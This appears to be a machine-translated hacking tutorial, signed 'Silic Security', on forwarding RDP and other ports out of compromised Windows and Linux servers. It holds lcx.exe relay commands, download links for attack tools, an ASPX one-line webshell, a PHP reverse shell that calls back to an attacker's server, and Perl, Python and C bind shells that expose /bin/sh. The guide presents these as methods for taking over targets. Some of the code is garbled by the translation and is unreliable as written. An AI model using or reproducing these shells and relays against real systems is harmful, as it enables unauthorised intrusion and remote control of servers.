I. Sample baklinks with "Lcx.exe"
First download Lcx.exe from
Attach.blackbap.org/down/yclj/lcx.exe
The program can be running in Windows server and the program could backlink 3389 to another server.
Opening and Listening a port (like 3333) with Lcx.exe on a Local Server, and Link 3333 Port to 4444 port for Local:
Lcx.exe-l 3333 4444
Then command LCX on server, backlink the Remote Desktop port 3389
Lcx.exe-s Your-server-ip 3333 127.0. 0.1 3389
The connection like this:
target- 3389 <<-->> remote-lcx <<-->> your-server-3333 <<-->> your-server- 4444
If successed, connecting 127.0.0.1:4444 equal target:3389
Ii. Using ASPX Script backlinks Remote Port
The tool can download at here:
Attach.blackbap.org/down/wzaq/aspx.rar
Before used it should done followings, have a ASPX Webshell on target, and ASP. NET can running well.
<%@ page language= "C #" validaterequest= "false"%><%try{System.Reflection.Assembly.Load (Request.BinaryRead (int.) Parse (request.cookies["PSW"). Value)). CreateInstance ("C", true, System.Reflection.BindingFlags.Default, NULL, new object[] {This}, NULL, NULL); } catch {}%>
and using LCX for a internet machine
At the end is setting
The picture backlinked the 14147 port, and the other no difference.
Iii. Using JSP Script with Socket
The JSP Script can download here:
Http://attach.blackbap.org/down/wzaq/jspdkzf.rar
The server should supports Java environment, useage like following:
target/jspdkzf.jsp?localip= 127.0.0.1&localport=3389&remoteip=your-server-ip-address&remoteport=3333
This script also can backlinks 3306 (MySQL default port), (SSH default port) ....
Iv. Using PHP Script with Socket
The script supports Win server and Linux server, it load socket package with DL () function,the code following:
<?phpfunction Phpsocket () {@set_time_limit (0), $system =strtoupper (substr (php_os, 0, 3)), if (!extension_loaded (' Sockets ') {if ($system = = ' WIN ') {@dl (' php_sockets.dll ') or Die ("Can ' t load socket");} else{@dl (' sockets.so ') or Die ("Can ' t load socket");}} if (Isset ($_post[' host ')) && isset ($_post[' Port ')) {$host = $_post[' host ']; $port = $_post[' Port '];} Else{print<<<silic<p>php_sockets setting Openning<br></p><form method=post action= "?" >host:<input type=text name=host value= "" ><br>port:<input type=text name=port value= "1120" >< Br><br><input type= "Radio" Name=info value= "Linux" Checked>linux <input type= "Radio" Name=info value = "Win" >windows <input class= "BT" Type=submit name=submit value= "backlink" ><br></form>silic;} if ($system = = "WIN") {$env =array (' path ' = ' c:\\windows\\system32 ');} else{$env = Array (' PATH ' = '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin ');} $descriptorspec = Array (0 = Array ("Pipe", "R"), 1 = = Array ("Pipe", "w"), 2 = = Array ("Pipe", "w"), $host =gethostbyname ($host); $proto = Getprotobyname ("TCP"), if (($sock =socket_create (Af_inet,sock_stream, $proto)) (<0) {die ("socket creat Failed");} if ($ret =socket_connect ($sock, $host, $port)) (<0) {die ("Connect Failed");} else{$message = "-------------PHP backlink, Silic Security-------------\\n"; Socket_write ($sock, $message, strlen ($ Message), $cwd =str_replace (' \ \ ', '/', dirname (__file__)), while ($cmd =socket_read ($sock, 65535, $proto)) {if (Trim ( Strtolower ($cmd)) = = "Exit") {Socket_write ($sock, "bye\n"); exit;} else{$process = Proc_open ($cmd, $descriptorspec, $pipes, $CWD, $env), if (Is_resource ($process)) {fwrite ($pipes [0], $cmd ); fclose ($pipes [0]), $msg =stream_get_contents ($pipes [1]), Socket_write ($sock, $msg, strlen ($msg)), fclose ($pipes [1] ); $msg =stream_get_contents ($pipes [2]); Socket_write ($sock, $msg, strlen ($msg)); $return _value = Proc_close ($process) ;}}}}} @phpsocket ();? >
The host in form is the your server IP address, and port in the form is which the listening on your server.
The shell in the code can be changed.
V. 80/443 Port multiplexing and Privilege escalation
Here is the tool, it supports aspx/php/jsp Scripts.
Attach.blackbap.org/down/yclj/reduh.rar
URL is Reduh Server Webshell, remote host can using default (127.0.0.1), remote port was which you want backlinks
Any port with rules can used (default was Port 1234), then creat the link in program, connect the default port 1234 on local
Connect with local software or Telnet or any program can connecting.
(The picture used a wrong shell for target)
Vi. bind a port on target server
Perl script
#!/usr/bin/perl$os = $^o; $SHELL = "/bin/sh", if ($os =~ m/win/i) {$SHELL = "%comspec%/k";} if (@ARGV < 1) {exit (1);} $LISTEN _port= $ARGV [0];use socket; $protocol =getprotobyname (' TCP '); socket (s,&pf_inet,&sock_stream,$ Protocol) | | Die ("error\n"); setsockopt (s,sol_socket,so_reuseaddr,1); Bind (s,sockaddr_in ($LISTEN _port,inaddr_any)) | | Die ("error\n"); listen (s,3) | | Die "", while (1) {accept (conn,s); $pid =fork)) {die "Cannot fork" if (!defined $pid); open STDIN, "<&conn"; open STDOUT, ">&conn"; open STDERR, " >&conn "; Exec $SHELL | | Die ("error\n"); close conn;exit 0;}}
Python script
#!/usr/bin/env pythonimport OS, sys, socket, timemax_len=1024shell= "/bin/bash-c" time_out=300port= "" HOST= "" Def Shell ( CMD): Sh_out=os.popen (shell+ "" +cmd). ReadLines () nsh_out= "" For I in Range (len (sh_out)): Nsh_out+=sh_out[i]return Nsh_ OUTDEF Action (conn): While TRUE:TRY:PCMD=CONN.RECV (Max_len) except:print ("error\n") return trueelse:cmd= "" For I In Range (len (pcmd)-1): Cmd+=pcmd[i]if cmd== ":d C": Return trueelif cmd== ": SD": Return falseelse:if len (cmd) >0:out=shell (CMD) conn.send (out) argv=sys.argvif len (argv) ==2:port=argv[1]elif len (argv) ==3:port=argv[1]host=argv[2]else:exit ( 1) port=int (PORT) if Os.fork ()!=0:sys.exit (0) Sock=socket.socket (socket.af_inet, socket. SOCK_STREAM) Sock.settimeout (time_out) If Len (argv) ==2:sock.bind ((' localhost ', PORT)) Sock.listen (0) Run=truewhile Run:if Len (argv) ==3:try:sock.connect ((HOST, PORT)) Except:print ("error\n") Time.sleep (5) else:run=action (sock) Else: Try: (CONN,ADDR) =sock.accept () except:print ("error\n") time.sleep (1) else:run=action (conn) If Len (argv) ==2: Conn.shutdown (2) Else:try:sock.send ("") except:time.sleep (1) else:sock.shutdown (2)
C Script
#include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h>int main (argc,argv) int Argc;char **argv; {int SOCKFD, newfd;struct sockaddr_in remote;if (fork () = = 0) {remote.sin_family = Af_inet;remote.sin_port = htons (atoi (AR GV[1]), remote.sin_addr.s_addr = Htonl (inaddr_any), SOCKFD = socket (af_inet,sock_stream,0), if (!SOCKFD) perror ("Error \ n "), Bind (SOCKFD, (struct sockaddr *) &remote, 0x10); listen (sockfd,5); while (1) {newfd=accept (sockfd,0,0);d up2 ( newfd,0);d up2 (newfd,1);d up2 (newfd,2); Execl ("/bin/sh", "sh", (char *) 0); close (NEWFD);}} int Chpass (char *base, char *entered) {int i;for (I=0;i<strlen (entered); i++) {if (entered[i] = = ' \ n ') entered[i] = ' + '; if (entered[i] = = ' \ r ') Entered[i] = ' + ';} if (!strcmp (base,entered)) return 0;}
The usage is same
Script Target Port
C Script is best (I think), Opening and Binding a shell/command line Port on Webshell, Forwarding and Making a Privilege Es Calation is a good Method for owned a Target.
Silic security,to Be Continued ....
Silic. Org